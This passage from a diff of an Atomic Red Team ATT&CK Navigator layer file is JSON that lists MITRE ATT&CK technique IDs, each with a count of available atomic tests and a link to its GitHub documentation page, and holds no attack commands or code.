Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1529","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1531","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":12,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546","score":39,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}]},{"techniqueID":"T1546.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.004","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":4,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.014","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":45,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547.001","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":42,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.002","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1552.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.001","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":30,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555.003","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556.003","score":3,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}]},{"techniqueID":"T1559.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":10,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":118,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":52,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":3,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":28,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569.002","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]},{"techniqueID":"T1614","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1647","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1647/T1647.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file +{"name":"Atomic Red Team","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":49,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.001","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":21,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.004/T1021.004.md"}]},{"techniqueID":"T1021.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.005/T1021.005.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":23,"enabled":true,"links":[{"label":"View 